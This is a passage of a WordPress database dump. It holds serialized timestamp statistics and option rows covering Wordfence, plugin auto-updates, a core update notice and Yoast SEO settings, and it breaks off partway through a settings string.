:1:{i:0;i:1;}i:1688832000;a:1:{i:0;i:1;}i:1688853600;a:1:{i:0;i:1;}i:1688875200;a:1:{i:0;i:1;}i:1688936400;a:1:{i:0;i:1;}i:1688954400;a:1:{i:0;i:2;}i:1688976000;a:1:{i:0;i:3;}i:1688979600;a:1:{i:0;i:3;}i:1689001200;a:1:{i:0;i:1;}i:1689048000;a:1:{i:0;i:1;}i:1689098400;a:1:{i:0;i:1;}i:1689112800;a:1:{i:0;i:1;}i:1689120000;a:1:{i:0;i:3;}i:1689130800;a:1:{i:0;i:1;}i:1689138000;a:1:{i:0;i:1;}i:1689166800;a:1:{i:0;i:1;}i:1689213600;a:1:{i:0;i:23;}i:1689256800;a:1:{i:0;i:1;}i:1689260400;a:1:{i:0;i:2;}i:1689271200;a:1:{i:0;i:1;}i:1689296400;a:1:{i:0;i:3;}i:1689300000;a:1:{i:0;i:3;}i:1689361200;a:1:{i:0;i:2;}i:1689375600;a:1:{i:0;i:1;}i:1689382800;a:1:{i:0;i:1;}i:1689393600;a:1:{i:0;i:41;}i:1689397200;a:1:{i:0;i:282;}i:1689400800;a:1:{i:0;i:12;}i:1689404400;a:1:{i:0;i:9;}i:1689408000;a:1:{i:0;i:3;}i:1689411600;a:1:{i:0;i:3;}i:1689415200;a:1:{i:0;i:3;}i:1689418800;a:1:{i:0;i:3;}i:1689422400;a:1:{i:0;i:4;}i:1689426000;a:1:{i:0;i:4;}i:1689433200;a:1:{i:0;i:5;}i:1689436800;a:1:{i:0;i:3;}i:1689444000;a:1:{i:0;i:4;}i:1689451200;a:1:{i:0;i:1;}i:1689454800;a:1:{i:0;i:3;}i:1689458400;a:1:{i:0;i:2;}i:1689465600;a:1:{i:0;i:1;}i:1689469200;a:1:{i:0;i:3;}i:1689472800;a:1:{i:0;i:2;}i:1689480000;a:1:{i:0;i:3;}i:1689487200;a:1:{i:0;i:3;}i:1689490800;a:1:{i:0;i:2;}i:1689494400;a:1:{i:0;i:1;}i:1689508800;a:1:{i:0;i:1;}i:1689519600;a:1:{i:0;i:2;}i:1689526800;a:2:{i:1;i:2;i:0;i:2;}i:1689541200;a:1:{i:0;i:1;}i:1689548400;a:1:{i:0;i:4;}i:1689552000;a:1:{i:0;i:1;}i:1689559200;a:1:{i:0;i:1;}i:1689566400;a:1:{i:0;i:2;}i:1689573600;a:1:{i:0;i:1;}i:1689577200;a:1:{i:0;i:4;}i:1689584400;a:1:{i:0;i:4;}i:1689598800;a:1:{i:0;i:1;}i:1689606000;a:1:{i:0;i:1;}i:1689609600;a:1:{i:0;i:3;}i:1689616800;a:1:{i:1;i:1;}i:1689638400;a:1:{i:0;i:1;}i:1689642000;a:1:{i:0;i:3;}i:1689649200;a:1:{i:0;i:1;}i:1689652800;a:1:{i:0;i:1;}i:1689660000;a:1:{i:0;i:2;}i:1689667200;a:2:{i:0;i:1;i:1;i:1;}i:1689678000;a:1:{i:0;i:1;}i:1689685200;a:1:{i:0;i:4;}i:1689753600;a:1:{i:1;i:1;}i:1689757200;a:1:{i:0;i:2;}i:1689793200;a:1:{i:1;i:1;}i:1689796800;a:1:{i:0;i:1;}i:1689800400;a:1:{i:0;i:3;}i:1689811200;a:1:{i:0;i:3;}i:1689822000;a:1:{i:0;i:3;}i:1689829200;a:1:{i:0;i:1;}i:1689836400;a:1:{i:0;i:1;}i:1689865200;a:1:{i:0;i:1;}i:1689868800;a:1:{i:0;i:3;}i:1689897600;a:1:{i:0;i:1;}i:1689919200;a:1:{i:1;i:1;}i:1689926400;a:1:{i:1;i:1;}i:1689940800;a:1:{i:0;i:3;}i:1689951600;a:1:{i:0;i:1;}i:1689955200;a:1:{i:0;i:3;}i:1689984000;a:1:{i:0;i:1;}i:1690020000;a:1:{i:0;i:37;}i:1690038000;a:1:{i:1;i:1;}i:1690045200;a:1:{i:0;i:1;}i:1690074000;a:1:{i:0;i:3;}i:1690102800;a:1:{i:0;i:111;}i:1690106400;a:1:{i:0;i:138;}i:1690110000;a:1:{i:0;i:11;}i:1690113600;a:1:{i:0;i:7;}i:1690117200;a:1:{i:0;i:5;}i:1690120800;a:1:{i:0;i:3;}i:1690124400;a:1:{i:0;i:3;}i:1690146000;a:1:{i:0;i:3;}i:1690156800;a:1:{i:0;i:3;}i:1690160400;a:1:{i:0;i:2;}i:1690164000;a:1:{i:0;i:1;}i:1690167600;a:1:{i:0;i:2;}i:1690171200;a:1:{i:0;i:1;}i:1690174800;a:1:{i:0;i:2;}i:1690178400;a:1:{i:0;i:2;}i:1690182000;a:1:{i:0;i:1;}i:1690185600;a:1:{i:0;i:1;}i:1690189200;a:1:{i:0;i:1;}i:1690192800;a:1:{i:0;i:2;}i:1690203600;a:1:{i:0;i:2;}i:1690207200;a:1:{i:0;i:1;}i:1690210800;a:1:{i:0;i:1;}i:1690214400;a:1:{i:0;i:2;}i:1690221600;a:1:{i:0;i:5;}i:1690225200;a:1:{i:0;i:190;}i:1690228800;a:1:{i:0;i:169;}i:1690232400;a:1:{i:0;i:141;}i:1690236000;a:1:{i:0;i:8;}i:1690239600;a:1:{i:0;i:2;}i:1690243200;a:1:{i:0;i:3;}i:1690246800;a:1:{i:0;i:2;}i:1690250400;a:1:{i:0;i:3;}i:1690254000;a:1:{i:0;i:2;}i:1690257600;a:1:{i:0;i:4;}i:1690261200;a:1:{i:0;i:3;}i:1690264800;a:1:{i:0;i:3;}i:1690268400;a:1:{i:0;i:5;}i:1690272000;a:1:{i:0;i:3;}i:1690275600;a:1:{i:0;i:4;}i:1690279200;a:1:{i:0;i:7;}i:1690282800;a:1:{i:0;i:5;}i:1690286400;a:1:{i:0;i:4;}i:1690290000;a:1:{i:0;i:7;}i:1690293600;a:1:{i:0;i:1;}i:1690297200;a:1:{i:0;i:2;}i:1690300800;a:1:{i:0;i:8;}i:1690304400;a:1:{i:0;i:1;}i:1690308000;a:1:{i:0;i:5;}i:1690311600;a:1:{i:0;i:4;}i:1690318800;a:1:{i:0;i:2;}i:1690333200;a:1:{i:0;i:1;}i:1690336800;a:1:{i:0;i:5;}i:1690347600;a:1:{i:0;i:5;}i:1690362000;a:1:{i:0;i:3;}i:1690369200;a:1:{i:0;i:5;}i:1690376400;a:1:{i:0;i:1;}i:1690380000;a:1:{i:0;i:7;}i:1690387200;a:1:{i:0;i:2;}i:1690398000;a:1:{i:0;i:3;}i:1690416000;a:1:{i:0;i:1;}i:1690423200;a:1:{i:0;i:3;}i:1690437600;a:1:{i:0;i:2;}i:1690441200;a:1:{i:0;i:1;}i:1690459200;a:1:{i:0;i:5;}i:1690473600;a:1:{i:0;i:4;}i:1690502400;a:1:{i:0;i:3;}i:1690513200;a:1:{i:0;i:3;}i:1690516800;a:1:{i:0;i:6;}i:1690538400;a:1:{i:0;i:1;}i:1690549200;a:1:{i:0;i:1;}i:1690603200;a:1:{i:0;i:1;}i:1690621200;a:1:{i:0;i:2;}i:1690639200;a:1:{i:0;i:1;}i:1690894800;a:1:{i:0;i:1;}i:1690912800;a:1:{i:0;i:2;}i:1691103600;a:1:{i:0;i:3;}i:1691132400;a:1:{i:0;i:2;}i:1691301600;a:1:{i:1;i:1;}i:1691334000;a:1:{i:1;i:1;}i:1691337600;a:1:{i:1;i:1;}i:1691402400;a:1:{i:1;i:2;}i:1691506800;a:1:{i:1;i:1;}i:1691604000;a:1:{i:1;i:1;}i:1691614800;a:1:{i:0;i:2;}i:1691852400;a:1:{i:1;i:2;}i:1691859600;a:1:{i:1;i:2;}i:1692043200;a:1:{i:0;i:2;}i:1692147600;a:1:{i:0;i:2;}i:1692381600;a:1:{i:0;i:144;}i:1692385200;a:1:{i:0;i:110;}i:1692388800;a:1:{i:0;i:3;}i:1692392400;a:1:{i:0;i:1;}i:1692396000;a:1:{i:0;i:3;}i:1692399600;a:1:{i:0;i:3;}i:1692403200;a:1:{i:0;i:2;}i:1692406800;a:1:{i:0;i:3;}i:1692410400;a:1:{i:0;i:2;}i:1692414000;a:1:{i:0;i:2;}i:1692417600;a:1:{i:0;i:1;}i:1692421200;a:1:{i:0;i:1;}i:1692424800;a:1:{i:0;i:4;}i:1692428400;a:1:{i:0;i:6;}i:1692432000;a:1:{i:0;i:2;}i:1692435600;a:1:{i:0;i:2;}i:1692439200;a:1:{i:0;i:2;}i:1692442800;a:1:{i:0;i:2;}i:1692446400;a:1:{i:0;i:1;}i:1692450000;a:1:{i:0;i:3;}i:1692453600;a:1:{i:0;i:2;}i:1692457200;a:1:{i:0;i:4;}i:1692460800;a:1:{i:0;i:1;}i:1692464400;a:1:{i:0;i:1;}i:1692468000;a:1:{i:0;i:1;}i:1692500400;a:1:{i:0;i:1;}i:1692504000;a:1:{i:0;i:1;}i:1692511200;a:1:{i:0;i:1;}i:1692514800;a:1:{i:0;i:2;}i:1692525600;a:1:{i:0;i:1;}i:1692536400;a:1:{i:0;i:1;}i:1692540000;a:1:{i:0;i:1;}i:1692604800;a:1:{i:0;i:3;}i:1692612000;a:1:{i:0;i:1;}i:1692615600;a:1:{i:0;i:1;}i:1692630000;a:1:{i:0;i:1;}i:1692676800;a:1:{i:0;i:1;}i:1692720000;a:1:{i:0;i:1;}i:1692774000;a:1:{i:0;i:1;}i:1692799200;a:1:{i:0;i:2;}i:1692820800;a:1:{i:0;i:1;}i:1692867600;a:1:{i:0;i:1;}i:1692900000;a:1:{i:0;i:73;}i:1693242000;a:1:{i:0;i:2;}i:1693321200;a:1:{i:0;i:1;}i:1693328400;a:1:{i:0;i:3;}i:1693350000;a:1:{i:0;i:31;}i:1693386000;a:1:{i:0;i:8;}i:1693429200;a:1:{i:0;i:1;}i:1693468800;a:1:{i:0;i:2;}i:1693519200;a:1:{i:0;i:9;}i:1693530000;a:1:{i:0;i:3;}i:1693602000;a:1:{i:0;i:3;}i:1693616400;a:1:{i:0;i:39;}i:1693645200;a:1:{i:0;i:3;}i:1693720800;a:1:{i:0;i:3;}i:1693724400;a:1:{i:0;i:2;}i:1694030400;a:1:{i:0;i:135;}i:1694455200;a:1:{i:1;i:1;}i:1694523600;a:1:{i:0;i:1;}i:1694552400;a:1:{i:0;i:1;}i:1694624400;a:1:{i:1;i:1;}i:1694682000;a:1:{i:0;i:202;}i:1694685600;a:1:{i:0;i:53;}i:1694836800;a:1:{i:0;i:71;}i:1695862800;a:1:{i:0;i:3;}i:1696683600;a:1:{i:0;i:2;}i:1696798800;a:1:{i:0;i:3;}i:1696924800;a:1:{i:0;i:3;}i:1697090400;a:1:{i:1;i:1;}i:1699588800;a:1:{i:0;i:2;}i:1699725600;a:1:{i:0;i:1;}i:1699758000;a:1:{i:0;i:3;}i:1699848000;a:1:{i:0;i:1;}i:1699891200;a:1:{i:0;i:1;}i:1699941600;a:1:{i:0;i:1;}i:1699988400;a:1:{i:0;i:5;}i:1699992000;a:1:{i:0;i:6;}i:1699995600;a:1:{i:0;i:7;}i:1699999200;a:1:{i:0;i:2;}i:1700035200;a:1:{i:1;i:1;}i:1700064000;a:1:{i:0;i:3;}i:1700103600;a:1:{i:0;i:3;}i:1700110800;a:1:{i:0;i:2;}i:1700128800;a:1:{i:0;i:2;}i:1700139600;a:1:{i:0;i:1;}i:1700143200;a:1:{i:0;i:1;}i:1700146800;a:1:{i:0;i:1;}i:1700247600;a:1:{i:0;i:1;}i:1700265600;a:1:{i:0;i:2;}i:1700269200;a:1:{i:0;i:4;}i:1700276400;a:1:{i:0;i:2;}i:1700280000;a:1:{i:0;i:1;}i:1700316000;a:1:{i:1;i:1;}i:1700323200;a:1:{i:0;i:3;}i:1700359200;a:1:{i:0;i:1;}i:1700373600;a:1:{i:0;i:1;}i:1700402400;a:1:{i:0;i:1;}i:1700434800;a:1:{i:0;i:1;}i:1700460000;a:1:{i:0;i:1;}i:1700550000;a:1:{i:0;i:2;}i:1700568000;a:1:{i:0;i:1;}i:1700578800;a:2:{i:0;i:1;i:1;i:1;}i:1700586000;a:1:{i:0;i:1;}i:1700593200;a:1:{i:0;i:1;}i:1700622000;a:1:{i:0;i:3;}i:1700625600;a:1:{i:0;i:3;}i:1700640000;a:1:{i:0;i:1;}i:1700697600;a:1:{i:0;i:17;}i:1700701200;a:1:{i:0;i:19;}i:1700719200;a:1:{i:0;i:15;}i:1700863200;a:1:{i:0;i:1;}i:1700906400;a:1:{i:0;i:1;}i:1700924400;a:1:{i:1;i:1;}i:1700931600;a:1:{i:1;i:1;}i:1700989200;a:1:{i:0;i:2;}i:1700992800;a:1:{i:0;i:2;}i:1700996400;a:1:{i:0;i:2;}i:1701000000;a:1:{i:0;i:3;}i:1701003600;a:1:{i:0;i:2;}i:1701007200;a:1:{i:0;i:2;}i:1701010800;a:1:{i:0;i:3;}i:1701014400;a:1:{i:0;i:3;}i:1701018000;a:1:{i:0;i:4;}i:1701021600;a:1:{i:0;i:3;}i:1701025200;a:1:{i:0;i:3;}i:1701028800;a:1:{i:0;i:2;}i:1701032400;a:1:{i:0;i:4;}i:1701036000;a:1:{i:0;i:1;}i:1701039600;a:1:{i:0;i:3;}i:1701043200;a:1:{i:0;i:1;}i:1701050400;a:1:{i:0;i:1;}i:1701068400;a:1:{i:0;i:3;}i:1701072000;a:1:{i:0;i:6;}i:1701075600;a:1:{i:0;i:2;}i:1701079200;a:1:{i:0;i:5;}i:1701082800;a:1:{i:0;i:5;}i:1701086400;a:1:{i:0;i:1;}i:1701090000;a:1:{i:0;i:2;}i:1701093600;a:1:{i:0;i:4;}i:1701097200;a:1:{i:0;i:2;}i:1701100800;a:1:{i:0;i:1;}i:1701104400;a:1:{i:0;i:3;}i:1701111600;a:1:{i:0;i:1;}i:1701115200;a:1:{i:0;i:1;}i:1701122400;a:1:{i:0;i:1;}i:1701129600;a:1:{i:0;i:1;}i:1701133200;a:1:{i:0;i:2;}i:1701136800;a:1:{i:0;i:1;}i:1701140400;a:1:{i:0;i:1;}i:1701147600;a:1:{i:0;i:1;}i:1701151200;a:1:{i:0;i:1;}i:1701158400;a:1:{i:0;i:1;}i:1701162000;a:1:{i:0;i:1;}i:1701165600;a:1:{i:0;i:3;}i:1701169200;a:1:{i:0;i:1;}i:1701176400;a:1:{i:0;i:2;}i:1701180000;a:1:{i:0;i:3;}i:1701183600;a:1:{i:0;i:5;}i:1701187200;a:1:{i:0;i:2;}i:1701190800;a:1:{i:0;i:4;}i:1701198000;a:1:{i:0;i:4;}i:1701201600;a:1:{i:0;i:5;}i:1701205200;a:1:{i:0;i:2;}i:1701208800;a:1:{i:0;i:1;}i:1701212400;a:1:{i:0;i:4;}i:1701216000;a:1:{i:0;i:2;}i:1701219600;a:1:{i:0;i:2;}i:1701223200;a:1:{i:0;i:2;}i:1701226800;a:1:{i:0;i:4;}i:1701230400;a:1:{i:0;i:2;}i:1701234000;a:1:{i:0;i:5;}i:1701237600;a:1:{i:0;i:2;}i:1701241200;a:1:{i:0;i:2;}i:1701244800;a:1:{i:0;i:3;}i:1701248400;a:1:{i:0;i:2;}i:1701252000;a:2:{i:1;i:1;i:0;i:3;}i:1701255600;a:1:{i:0;i:3;}i:1701259200;a:1:{i:0;i:2;}i:1701262800;a:1:{i:0;i:2;}i:1701266400;a:1:{i:0;i:2;}i:1701270000;a:1:{i:0;i:2;}i:1701273600;a:1:{i:1;i:1;}i:1701277200;a:1:{i:1;i:2;}i:1701280800;a:1:{i:0;i:4;}i:1701284400;a:1:{i:0;i:2;}i:1701288000;a:1:{i:0;i:3;}i:1701291600;a:2:{i:0;i:2;i:1;i:2;}i:1701295200;a:1:{i:0;i:3;}i:1701298800;a:1:{i:0;i:2;}i:1701302400;a:1:{i:0;i:4;}i:1701306000;a:1:{i:0;i:2;}i:1701309600;a:1:{i:0;i:1;}i:1701313200;a:1:{i:0;i:3;}i:1701316800;a:1:{i:0;i:4;}i:1701320400;a:1:{i:0;i:2;}i:1701324000;a:1:{i:0;i:5;}i:1701331200;a:1:{i:0;i:2;}i:1701334800;a:1:{i:0;i:1;}i:1701342000;a:1:{i:0;i:1;}i:1701345600;a:2:{i:1;i:1;i:0;i:1;}i:1701349200;a:1:{i:0;i:2;}i:1701352800;a:1:{i:0;i:3;}i:1701356400;a:1:{i:0;i:3;}i:1701360000;a:1:{i:0;i:1;}i:1701363600;a:1:{i:0;i:2;}i:1701367200;a:2:{i:0;i:3;i:1;i:1;}i:1701374400;a:1:{i:0;i:1;}i:1701378000;a:1:{i:0;i:1;}i:1701381600;a:1:{i:0;i:2;}i:1701385200;a:1:{i:0;i:3;}i:1701399600;a:1:{i:0;i:1;}i:1701414000;a:1:{i:0;i:3;}i:1701417600;a:1:{i:0;i:2;}i:1701421200;a:1:{i:0;i:5;}i:1701424800;a:1:{i:0;i:3;}i:1701428400;a:1:{i:0;i:1;}i:1701439200;a:1:{i:0;i:1;}i:1701446400;a:1:{i:0;i:1;}i:1701464400;a:1:{i:0;i:1;}i:1701468000;a:1:{i:0;i:1;}i:1701471600;a:1:{i:0;i:3;}i:1701475200;a:1:{i:0;i:1;}i:1701478800;a:1:{i:0;i:2;}i:1701489600;a:1:{i:0;i:1;}i:1701496800;a:1:{i:0;i:3;}i:1701500400;a:1:{i:0;i:2;}i:1701561600;a:1:{i:0;i:1;}i:1701565200;a:1:{i:0;i:1;}i:1701622800;a:1:{i:1;i:1;}i:1701709200;a:1:{i:1;i:1;}i:1701788400;a:1:{i:0;i:1;}i:1701979200;a:1:{i:0;i:4;}i:1702015200;a:1:{i:1;i:1;}i:1702227600;a:1:{i:1;i:1;}i:1702486800;a:1:{i:1;i:1;}i:1703102400;a:1:{i:0;i:3;}i:1703779200;a:1:{i:0;i:1;}i:1703829600;a:1:{i:0;i:1;}i:1703955600;a:1:{i:1;i:1;}i:1704330000;a:1:{i:0;i:5;}i:1704337200;a:1:{i:0;i:1;}i:1704348000;a:1:{i:0;i:6;}i:1704358800;a:1:{i:0;i:2;}i:1704366000;a:1:{i:0;i:3;}i:1704380400;a:1:{i:0;i:7;}i:1704405600;a:1:{i:0;i:12;}i:1704423600;a:1:{i:0;i:33;}i:1704603600;a:1:{i:0;i:1;}i:1704891600;a:1:{i:1;i:1;}i:1704988800;a:1:{i:1;i:1;}i:1705068000;a:1:{i:1;i:1;}i:1705086000;a:1:{i:1;i:1;}i:1705096800;a:1:{i:1;i:1;}i:1705255200;a:1:{i:1;i:1;}i:1705316400;a:1:{i:0;i:1;}i:1705410000;a:1:{i:1;i:1;}i:1705514400;a:1:{i:0;i:3;}i:1705525200;a:1:{i:1;i:1;}i:1705597200;a:1:{i:1;i:1;}i:1705820400;a:1:{i:0;i:3;}i:1705939200;a:1:{i:0;i:6;}i:1706115600;a:1:{i:0;i:3;}i:1706277600;a:1:{i:1;i:1;}i:1706436000;a:1:{i:0;i:3;}i:1706457600;a:1:{i:1;i:1;}i:1706526000;a:1:{i:0;i:3;}i:1706886000;a:1:{i:0;i:5;}i:1707008400;a:1:{i:0;i:32;}i:1707120000;a:1:{i:0;i:1;}i:1707692400;a:1:{i:0;i:9;}i:1707861600;a:1:{i:0;i:3;}i:1708772400;a:1:{i:0;i:3;}i:1708966800;a:1:{i:0;i:2;}i:1709305200;a:1:{i:0;i:3;}i:1709560800;a:1:{i:0;i:1;}i:1709604000;a:1:{i:0;i:15;}i:1709712000;a:1:{i:0;i:3;}i:1709733600;a:1:{i:0;i:2;}i:1709758800;a:1:{i:0;i:1;}i:1709780400;a:1:{i:0;i:2;}i:1709791200;a:1:{i:0;i:2;}i:1709812800;a:1:{i:0;i:3;}i:1709838000;a:1:{i:0;i:1;}i:1709845200;a:1:{i:1;i:1;}i:1709863200;a:1:{i:0;i:1;}i:1709877600;a:1:{i:0;i:3;}i:1709899200;a:1:{i:0;i:3;}i:1709920800;a:1:{i:0;i:2;}i:1709931600;a:1:{i:1;i:1;}i:1709946000;a:1:{i:0;i:1;}i:1709964000;a:1:{i:0;i:1;}i:1709985600;a:1:{i:0;i:2;}i:1710010800;a:1:{i:0;i:3;}i:1710064800;a:1:{i:0;i:2;}i:1710068400;a:1:{i:0;i:1;}i:1710093600;a:1:{i:0;i:3;}i:1710144000;a:1:{i:0;i:2;}i:1710169200;a:1:{i:0;i:3;}i:1710183600;a:1:{i:0;i:1;}i:1710194400;a:1:{i:0;i:3;}i:1710216000;a:1:{i:0;i:2;}i:1710226800;a:1:{i:0;i:4;}i:1710237600;a:1:{i:0;i:1;}i:1710266400;a:1:{i:0;i:6;}i:1710309600;a:1:{i:0;i:5;}i:1710334800;a:1:{i:0;i:2;}i:1710360000;a:1:{i:0;i:3;}i:1710385200;a:1:{i:0;i:5;}i:1710396000;a:1:{i:0;i:4;}i:1710414000;a:1:{i:0;i:4;}i:1710442800;a:1:{i:0;i:4;}i:1710475200;a:1:{i:0;i:5;}i:1710507600;a:1:{i:0;i:1;}i:1710540000;a:1:{i:0;i:4;}i:1710568800;a:1:{i:0;i:2;}i:1710597600;a:1:{i:0;i:3;}i:1710630000;a:1:{i:0;i:6;}i:1710662400;a:1:{i:0;i:4;}i:1710716400;a:1:{i:0;i:3;}i:1710720000;a:1:{i:0;i:1;}i:1710741600;a:1:{i:0;i:1;}i:1710766800;a:1:{i:0;i:5;}i:1710792000;a:1:{i:0;i:2;}i:1710820800;a:1:{i:0;i:6;}i:1710842400;a:1:{i:0;i:4;}i:1710871200;a:1:{i:0;i:5;}i:1710896400;a:1:{i:0;i:1;}i:1710921600;a:1:{i:0;i:1;}i:1710946800;a:1:{i:0;i:3;}i:1710972000;a:1:{i:0;i:3;}i:1710993600;a:1:{i:0;i:7;}i:1711004400;a:1:{i:0;i:1;}i:1711008000;a:1:{i:0;i:1;}i:1711022400;a:1:{i:0;i:5;}i:1711047600;a:1:{i:0;i:2;}i:1711080000;a:1:{i:0;i:1;}i:1711094400;a:1:{i:0;i:3;}i:1711119600;a:1:{i:0;i:1;}i:1711144800;a:1:{i:0;i:3;}i:1711173600;a:1:{i:0;i:2;}i:1711224000;a:1:{i:0;i:3;}i:1711263600;a:1:{i:0;i:1;}i:1711645200;a:1:{i:0;i:1;}i:1711666800;a:1:{i:0;i:1;}i:1711828800;a:1:{i:0;i:1;}i:1711861200;a:1:{i:0;i:3;}i:1711908000;a:1:{i:0;i:2;}i:1711940400;a:1:{i:0;i:3;}i:1711998000;a:1:{i:0;i:3;}i:1712001600;a:1:{i:1;i:1;}i:1712318400;a:1:{i:0;i:378;}i:1712322000;a:1:{i:0;i:2;}i:1712325600;a:1:{i:0;i:4;}i:1712332800;a:1:{i:0;i:1;}i:1712336400;a:1:{i:0;i:1;}i:1712340000;a:1:{i:0;i:2;}i:1712343600;a:1:{i:0;i:1;}i:1712350800;a:1:{i:0;i:1;}i:1712354400;a:1:{i:0;i:2;}i:1712358000;a:1:{i:0;i:1;}i:1712368800;a:1:{i:0;i:2;}i:1712372400;a:1:{i:0;i:2;}i:1712376000;a:1:{i:0;i:5;}i:1712379600;a:1:{i:0;i:4;}i:1712390400;a:1:{i:0;i:1;}i:1712394000;a:1:{i:0;i:1;}i:1712397600;a:1:{i:0;i:1;}i:1712419200;a:1:{i:0;i:1;}i:1712426400;a:1:{i:0;i:1;}i:1712462400;a:1:{i:0;i:1;}i:1712466000;a:1:{i:0;i:1;}i:1712469600;a:1:{i:0;i:2;}i:1712494800;a:1:{i:0;i:1;}i:1712530800;a:1:{i:0;i:1;}i:1712545200;a:1:{i:0;i:3;}i:1712552400;a:1:{i:0;i:1;}i:1712563200;a:1:{i:0;i:2;}i:1712566800;a:1:{i:0;i:1;}i:1712588400;a:1:{i:0;i:1;}i:1712700000;a:1:{i:0;i:1;}}', 'no');
INSERT INTO `wpou_options` VALUES
(235, 'wordfenceActivated', '1', 'yes'),
(236, 'wf_plugin_act_error', '', 'yes'),
(247, 'auto_update_plugins', 'a:12:{i:0;s:19:"akismet/akismet.php";i:1;s:27:"astra-hooks/astra-hooks.php";i:2;s:23:"loginizer/loginizer.php";i:3;s:23:"wordfence/wordfence.php";i:4;s:27:"wp-super-cache/wp-cache.php";i:5;s:24:"wordpress-seo/wp-seo.php";i:6;s:40:"wordpress-seo-premium/wp-seo-premium.php";i:7;s:25:"wpseo-video/video-seo.php";i:8;s:25:"wpseo-local/local-seo.php";i:9;s:39:"wpseo-woocommerce/wpseo-woocommerce.php";i:10;s:25:"wpseo-news/wpseo-news.php";i:11;s:57:"acf-content-analysis-for-yoast-seo/yoast-acf-analysis.php";}', 'no'),
(133, 'https_detection_errors', 'a:0:{}', 'yes'),
(17840, 'auto_core_update_notified', 'a:4:{s:4:"type";s:7:"success";s:5:"email";s:22:"web21@freshgasflow.com";s:7:"version";s:5:"6.5.2";s:9:"timestamp";i:1712702747;}', 'no'),
(186, 'yoast_migrations_free', 'a:1:{s:7:"version";s:4:"22.4";}', 'yes'),
(187, 'wpseo', 'a:110:{s:8:"tracking";b:0;s:16:"toggled_tracking";b:0;s:22:"license_server_version";b:0;s:15:"ms_defaults_set";b:0;s:40:"ignore_search_engines_discouraged_notice";b:0;s:19:"indexing_first_time";b:1;s:16:"indexing_started";b:0;s:15:"indexing_reason";s:23:"home_url_option_changed";s:29:"indexables_indexing_completed";b:1;s:13:"index_now_key";s:0:"";s:7:"version";s:4:"22.4";s:16:"previous_version";s:4:"22.1";s:20:"disableadvanced_meta";b:1;s:30:"enable_headless_rest_endpoints";b:1;s:17:"ryte_indexability";b:0;s:11:"baiduverify";s:0:"";s:12:"googleverify";s:0:"";s:8:"msverify";s:0:"";s:12:"yandexverify";s:0:"";s:9:"site_type";s:0:"";s:20:"has_multiple_authors";s:0:"";s:16:"environment_type";s:0:"";s:23:"content_analysis_active";b:1;s:23:"keyword_analysis_active";b:1;s:34:"inclusive_language_analysis_active";b:0;s:21:"enable_admin_bar_menu";b:1;s:26:"enable_cornerstone_content";b:1;s:18:"enable_xml_sitemap";b:1;s:24:"enable_text_link_counter";b:1;s:16:"enable_index_now";b:1;s:19:"enable_ai_generator";b:0;s:22:"ai_enabled_pre_default";b:0;s:22:"show_onboarding_notice";b:1;s:18:"first_activated_on";i:1681117140;s:13:"myyoast-oauth";b:0;s:26:"semrush_integration_active";b:1;s:14:"semrush_tokens";a:0:{}s:20:"semrush_country_code";s:2:"us";s:19:"permalink_structure";s:12:"/%postname%/";s:8:"home_url";s:29:"https://www.happythinking.com";s:18:"dynamic_permalinks";b:0;s:17:"category_base_url";s:0:"";s:12:"tag_base_url";s:0:"";s:21:"custom_taxonomy_slugs";a:0:{}s:29:"enable_enhanced_slack_sharing";b:1;s:25:"zapier_integration_active";b:0;s:19:"zapier_subscription";a:0:{}s:14:"zapier_api_key";s:0:"";s:23:"enable_metabox_insights";b:1;s:23:"enable_link_suggestions";b:1;s:26:"algolia_integration_active";b:0;s:14:"import_cursors";a:0:{}s:13:"workouts_data";a:1:{s:13:"configuration";a:1:{s:13:"finishedSteps";a:0:{}}}s:28:"configuration_finished_steps";a:0:{}s:36:"dismiss_configuration_workout_notice";b:1;s:34:"dismiss_premium_deactivated_notice";b:0;s:19:"importing_completed";a:5:{s:30:"aioseo_custom_archive_settings";b:1;s:31:"aioseo_default_archive_settings";b:1;s:23:"aioseo_general_settings";b:1;s:32:"aioseo_posttype_default_settings";b:1;s:24:"aioseo_taxonomy_settings";b:1;}s:26:"wincher_integration_active";b:1;s:14:"wincher_tokens";a:0:{}s:36:"wincher_automatically_add_keyphrases";b:0;s:18:"wincher_website_id";s:0:"";s:28:"wordproof_integration_active";b:0;s:29:"wordproof_integration_changed";b:0;s:18:"first_time_install";b:1;s:34:"should_redirect_after_install_free";b:0;s:34:"activation_redirect_timestamp_free";i:1681117142;s:18:"remove_feed_global";b:0;s:27:"remove_feed_global_comments";b:0;s:25:"remove_feed_post_comments";b:0;s:19:"remove_feed_authors";b:0;s:22:"remove_feed_categories";b:0;s:16:"remove_feed_tags";b:0;s:29:"remove_feed_custom_taxonomies";b:0;s:22:"remove_feed_post_types";b:0;s:18:"remove_feed_search";b:0;s:21:"remove_atom_rdf_feeds";b:0;s:17:"remove_shortlinks";b:0;s:21:"remove_rest_api_links";b:0;s:20:"remove_rsd_wlw_links";b:0;s:19:"remove_oembed_links";b:0;s:16:"remove_generator";b:0;s:20:"remove_emoji_scripts";b:0;s:24:"remove_powered_by_header";b:0;s:22:"remove_pingback_header";b:0;s:28:"clean_campaign_tracking_urls";b:0;s:16:"clean_permalinks";b:0;s:32:"clean_permalinks_extra_variables";s:0:"";s:14:"search_cleanup";b:0;s:20:"search_cleanup_emoji";b:0;s:23:"search_cleanup_patterns";b:0;s:22:"search_character_limit";i:50;s:20:"deny_search_crawling";b:0;s:21:"deny_wp_json_crawling";b:0;s:20:"deny_adsbot_crawling";b:0;s:19:"deny_ccbot_crawling";b:0;s:29:"deny_google_extended_crawling";b:0;s:20:"deny_gptbot_crawling";b:0;s:27:"redirect_search_pretty_urls";b:0;s:29:"least_readability_ignore_list";a:0:{}s:27:"least_seo_score_ignore_list";a:0:{}s:23:"most_linked_ignore_list";a:0:{}s:24:"least_linked_ignore_list";a:0:{}s:28:"indexables_page_reading_list";a:5:{i:0;b:0;i:1;b:0;i:2;b:0;i:3;b:0;i:4;b:0;}s:25:"indexables_overview_state";s:21:"dashboard-not-visited";s:28:"last_known_public_post_types";a:2:{i:0;s:4:"post";i:1;s:4:"page";}s:28:"last_known_public_taxonomies";a:3:{i:0;s:8:"category";i:1;s:8:"post_tag";i:2;s:11:"post_format";}s:23:"last_known_no_unindexed";a:6:{s:40:"wpseo_total_unindexed_post_type_archives";i:1712002166;s:35:"wpseo_total_unindexed_general_items";i:1712002166;s:31:"wpseo_unindexed_post_link_count";i:1712002166;s:31:"wpseo_unindexed_term_link_count";i:1712002166;s:27:"wpseo_total_unindexed_posts";i:1686197496;s:27:"wpseo_total_unindexed_terms";i:1686978855;}s:14:"new_post_types";a:0:{}s:14:"new_taxonom